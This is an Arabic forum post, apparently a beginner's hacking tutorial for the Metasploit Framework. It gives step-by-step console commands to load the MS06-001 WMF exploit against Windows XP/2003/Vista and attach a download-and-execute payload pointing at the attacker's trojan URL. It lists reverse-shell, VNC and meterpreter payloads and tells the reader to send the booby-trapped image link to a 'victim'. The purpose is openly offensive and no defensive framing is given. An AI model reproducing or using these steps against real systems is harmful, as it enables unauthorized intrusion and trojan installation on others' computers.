بسم الله الرحمن الرحيم





خباركم لبى قلوبكم عسآكم بخير .
اليوم حلم الجميع قد يتحقق بعد دخوله للموضوع بإذن الله
الكل سمع عن مشروع كبير اسمه " مـيـتآ سـبـلـويـت
وهو بالحقيقه مشروع عظيم بكل النواحي
البعض اطلق عليه بالصعب او جعله كلـ مستحيل ان يتعلمه
وآجهة الكثير



وعادتي اذا كتبت الموضوع احب يكون الموضوع يشمل البرنآمج
بطرق مسهله ولا اعطيك المعقد ,, و الكثير جآني بالإيميل


شف اعطيك اياهآ من الحين الميتآ سبلويت
مشروع سهل بس مآبي منك الا اللي تشوفه تحفظه واذا منت حآفظه
مآعندك مشكله افتح لك مستند وحطه فيه وارجع له متى ما احتجت له ..
وصدقني راح تحفظه وانت مآتدري
يله بسم الله
اولا
عليك تحميل البرنآإمج

التحميل:
http://www.mediafire.com/?wzoqymz3zwi

البااس: سبحان الله



تمآم حملنآ البرنآمج وتثبيته تثبيت عآيدي NeXt NeXt NeXt

الحين دخلنآ بالمهم

نفتح بورت : 4444


وطبعآ زي اي برنآمج اختراق فتح بورته
الان دخلنآ باللعب


البرنآمج يطلب منك آوآمر لتطبيقهآ واللي عليك تحفظهآ او زي مآقلتلك مستند نص


حآن وقت الجد


1-


show Exploits


هذآ مهم جدآ ومعنآه إظهار الثغرات

2-


show payloads


وهذا اهم من اللي قبله هذا يقولك معنآه إظهار البايلودات


وشو البايلودآت ~!!

البآيلود يالبى قلبك معنآهآ الإستغلال يعني كيف تبي تخش البيت من السطح


من الدريشه <~ للتوضيح


3-


show options


وهذا كأنك تقول وش تبي <~ لاعاد توصف


هذا معناه لبى قلبك متطلبآت الثغره وش هي ~؟


4-


exploit


هذا الامر بحبو خالص خالص :28:

هذا النهآيه :31:


قصدي هذا معناه طبق او شغل الثغره :15:


5-


Set


آستخدم أو عين



6-


use


استخدم ولكن رآح نعرف الفرق بين الاثنين اذا تقدمنآ بالشرح لبى قلبك


7-


info


معلومات , لكن نسخدمه لمعلومات عن الثغره .. :15:


8-


Save


حفظ


9-


Exit


تلقاهآ عند الباب "خروج"


بس هذا اللي ابيه منك 9 اوامر اللي بصف اول متوسط بأول ثلاث صفحات اصعب من ذي :15:


كنت آنطق كثير ذيك الايام :31:


اي بي سي دي ولحسة مخ :31:


تهئ تهئ :31:


<~ خاش جوٍ :15:

خلصنآ من الاوآمر وصرنآ نعرف نآمر :15:


الان ندخل باللعبه


شف انآ انسان احب اشرح الشي السهل واللي يريحك واذا لقيت مفر من شي معقد


اتجه له ..


الان بعد تثبيت البرنآإمج نروح لمجلد البرنآمج بإبدأ وهذا اللي ابيك تتعلمهم حآليآ ً

كيف اشكآلهآ تخوف :15:


يله نشرح على حسب الترقيم :


=


1- ادآت الـ Cmd شل


وش له ~؟ تعرف اذا تقدمنآ بالدرس


=


2- ادات الميتآ GuI


هذي يسمونهآ الواجهه الرسوميه


وش فايدتهآ راح تعرف قدآم ^_^


=


3- الاداه العنيفه الميتآ ويب :15:


وش فايدتهآ بتعرف قدآم


=


4- اداة التحديث


وش فآيدتهآ تعرف قدآم <~ لا امزح :15:


هذي زيهآ زي برآمج الحمآيه


صح تسوي تحديث الميتآ يسوي تحديث


سهل صح :15:


وطبعآ عارف ليه تحدث :15:


وعرفنآ البرآمج وخلصنآ ^_^

دخلنآ الجزء اللي ابيه

نفتح اداة الميتآ ويب
رقم ثلاثه بالصوره ^_^


وبعد كذا بيطلع لنآ الميتا

مآعليك خلهآ ثواني .. لين يفتح لك الموقع .. وهذا هوٍ ~

تمآم الحين شغلنآ زي الحلاوه ^_^


فيه شريط الادوات فوق وش رايكم نعرف وش الادوات هذي ..


نبدأ من اول آمر من اليسآر ..


2-


Exploits


لو نرجع للآوآمر عرفنآ وش معنآتهآ ^_^


الثغرات ..


طيب نجرب على اي ثغره بهذا الامر


نضغط نجرب على Exploits


بيطلع لنآإ .~search

يالبى قلبك الحين يقولك ابحث عن اللي تبيه ..


طيب انآ ابيكم تعرفون كيف تستخدمون الامر ثغرات


طيب نجرب على اي ثغره ولـ نقول ثغرة WMf

وهي ثغره نظاميه تمكنك من الإختراق بصيغة صوره ..


طيب يله نكتب بالمربع


WMf


بدون انتر ولا شي


بيطلع لك ..

تمآم نضغط على الموجه عليهآ السهم ^_^
يقولك ياطويل العمر حدد الهدف :15:

ويقولك آنه تشتغل على وندوز Xp وٍ 2003 وٍ VisTa تمآتيك <~ تمآتيك ولا عايدي <~ انثبر :15:

نضغط على الـ Windows XP/2003/VistaAutomatic

والان رآح يطلع لنآإ .. exploit and target


تمآم يآطويل العمر هذا هوٍ الإستغلال اللي ابيك تنسخه ^_^


الحين نغلق النافذه حقت الـ Exploit

والان نروح للآمر console

الرابع من اليسآر الموجود بالصوره


هذا console


هو اللي بتعشقه من كثر مآبتفتحه


لان هذا هو الزبده بالدنيآ كلهآ ^_^


الان بعد عرفنآ الاوآمر هنآ نجي ونطبقهآ ^_^


طيب الان نكمل شرحنآ عن ثغرة WmF


بعد مآنسخنآ الإستغلال نفتح اداة الكونسول


بيطلع لك .. صورة سوداء

نيآهآ هآ هآ مرعبه :15:


تمآم الان نشوف السهم ونضغط عنده بالمآوس لنتمكن من الكتآبه ^_^


ونكتب


use windows/browser/ms06_001_wmf_setabortproc


هآ فيه آمر اسمه use وكنآ نقول انه معنآه استخدم تمآم ^_^


وطبعآ اللي بعد يوز هو الإستغلال اللي نسخنآه


وصار استخدام الإستغلال ^_^


وندوس آنتر ..
ثم نكتب show payloads

وطبعآ نعرف لـ آيش الامر هذا هوٍ إظهار البآيلودات ..


وطبعآ الإستغلالات كثيره ..


لكن آنآ بعطيك اهم الإستغلالات ..

=


windows/vncinject/reverse_tcp


1- فتح سطح المكتب 2- الدوس


=

windows/download_exec


1- إنزال ملف تنفيذي وتشغيله


=

windows/Sheel/reverse_tcp


1- فتح الدوس 2- اتصال عكسي مع الضحيه


=

windows/meterpreter/reverse_tcp

1- فتح الدوس 2- ملفات الضحيه


=


طبعآ الإستغلال لثغرة الـ wmf


هي استخدام نزول ملف تنفيذي بجهآز الضحيه ..

تمآم يعني نكتب


set paylod windows/download_exec


آهآ امر set إستخدآم .. يله الشاطر يفرق بين set و use ويقول متى نستخدم يوز ومتى سيت ^_^


طبعآ البآيلود معروف وشو واذا ماتعرفه سطر الاوامر موجود ..

وندوس آنتر ..


بعدين نكتب الامر ..


show options


ومعنآه موجود بأول السطور <~ آكرف يله


بتطلع لنآ نآفذه طآلع فيهآ المطلوب ..


آبيك تمعن فيهآ وتقرأ واذا ماتعرف للـ إنجليزي عندك العم قوقل مآقصدر ..


وانا واثق انك بمجرد مآتشوف المطلوب راح تفهم وش الناقص ^_^


وطبعآ فيه احد مآيعرف YeS,No


طيب يله نطبق الان الامر ..


set url www.server.com


www.server.com =رابط بآتشك المباشر ..


وندوس آنتر ..


وبعدهآ بيطلع لك .. استخدم الرابط ..


url => www.server.com

نجي للآمر الذي اعشقه منذ زمن


exploit


ومعنآه طبق أو استغل ..

تمآم تشوف الرابط المضلل عليه باللون الاحمر


انسخه واذهب فيه الى المتصفح وحمل الصوره الملغمه


وبعد ذلك ولله الحمد الان الكل صار يعرف كيف يستغل الثغرات


وآنآ ما اقولك الثغرات كـ وجه أكمل لـآ اقول عرفت كيفية التعامل معهآ


واذا جاك بكرا اي شرح لا يجيك لاتعقيد ولا كلام فاضي


تمآم الان وصلنآ لدرجه حلوه بالميتآ ..

الامر الاخير about


ومعنآه .. حوٍل مآرآح تستفيد منه الا اذا كنت مثقف :15:


=


Options


ومعنآه خيارات


وهو يمكنك من إختيار استايل للموقع .. كتغيير جوٍ :15:


نشوف نضغط على Options


تمآم تختار اللي يعجبك وتسوي


save skin


وبكذا راح يتغير .. وانت عليك تروق وتختار اللي تبيه

sessions


لـ مشآهدة الإتصالات العكسيه ندخل بالمفيد ..


-


payloads


البايلودات = الإستغلالات ..


هذي ممكن تفيدنآ بإستغلال ثغرات البفر والكثير الكثير ..


لمن يريد تجربة اداة الـ payloads


يقوم بمتآبعة شرح آخونا MeLeK-J


ثورة و بدأت [ الإختراق عن طريق الإيبي فقط ] درس في Remote Buffer Over Flow Exploits


-


auxiliarY


سأترك لكم التفكير مآعملهآ .. ومع آنه وآضح من الاسم ..

الان الحمد لله عرفنآ كل شي وضعنآ تمآم



لاتنسووووووووو الردووووووووود و التقييييييييييم